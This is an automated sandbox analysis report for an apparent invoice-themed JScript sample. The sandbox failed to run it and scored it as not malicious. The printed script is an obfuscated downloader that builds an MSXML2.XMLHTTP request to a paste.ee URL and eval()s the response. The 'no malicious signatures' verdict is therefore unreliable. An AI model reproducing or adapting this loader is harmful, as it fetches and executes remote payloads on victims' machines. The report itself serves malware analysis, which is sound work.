Windows Analysis Report
Factura N__ 202511300-5174

Overview

General Information

Sample name:Factura N__ 202511300-5174
Analysis ID:1676006
MD5:f3a9f825910b8bce004b0ba13d840c97
SHA1:4883573937e07371b1d9242100ce56bc2414effa
SHA256:3f5c583c3a317d63b43211cf3ac04b5dec84d0def7820989b866e02f5126c532
Errors
  • No process behavior to analyse as no analysis process or sample was found
  • Corrupt sample or wrongly selected analyzer. Details: invalid parameter

Detection

Score:0
Range:0 - 100
Confidence:100%

Signatures

No high impact signatures.

Classification

No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

There are no malicious signatures.

Source: classification engine
Classification label: unknown0.win@0/0@0/0
No Mitre Att&ck techniques found
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1676006
Start date and time:2025-04-28 09:02:21 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 1m 27s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:0
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
  • GSI enabled (Javascript)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Factura N__ 202511300-5174
Detection:UNKNOWN
Classification:unknown0.win@0/0@0/0
Cookbook Comments:
  • Unable to launch sample, stop analysis
  • No process behavior to analyse as no analysis process or sample was found
  • Corrupt sample or wrongly selected analyzer. Details: invalid parameter
No simulations
No context
No created / dropped files found
File type:Unicode text, UTF-8 text, with very long lines (486), with CRLF line terminators
Entropy (8bit):5.442426324948063
TrID:
    File name:Factura N__ 202511300-5174
    File size:1'672 bytes
    MD5:f3a9f825910b8bce004b0ba13d840c97
    SHA1:4883573937e07371b1d9242100ce56bc2414effa
    SHA256:3f5c583c3a317d63b43211cf3ac04b5dec84d0def7820989b866e02f5126c532
    SHA512:8b20e8b245383a13d68b8a4c0e7b35dc9af102660477554199a4fc04bcde96d65210f0196c9329a1d6ded8f46dac4da67770998205b5d97f579bf905b13b2990
    SSDEEP:48:O9IGv84VPnn7mR667Amns1Hss6367Q8pBqRaW7D:O9D4
    TLSH:2E31D867C8C73566A47A2C8E644AD6A013F480D77A37488D2C3BC3F60D67A7618517BD
    File Content Preview:var spitfires = "MSX..............................................ML2...............................................XML..............................................HTTP";..var pneumatomachy = new ActiveXObject(spitfires.split("...........................
    Icon Hash:72e2a2a292a2a2b2
    No network behavior found
    No statistics
    No system behavior

    Call Graph

    Call graph (figure not preserved). Nodes: entry, ActiveXObject(), split, join, replace, open, send, eval. Edges run from entry to open, send, join, split, replace and eval.

    Script:

    Code
    var spitfires = "MSX\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9ML2\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9.XML\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9HTTP";
    var pneumatomachy = new ActiveXObject ( spitfires.split ( "\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9" ).join ( "" ) );
        pneumatomachy.open ( "GET", "h\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9t\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9t\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9p\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9s\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9:\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9/\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9/\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9p\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9a\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9s\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9t\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9e\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9.\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9e\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9e\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9/\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9d\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9/\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9p\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd
83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9z\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9B\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9J\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9m\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9O\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9C\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9M".replace ( /\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9/g, "" ), false );
    pneumatomachy.send ( );
    eval ( pneumatomachy.responseText );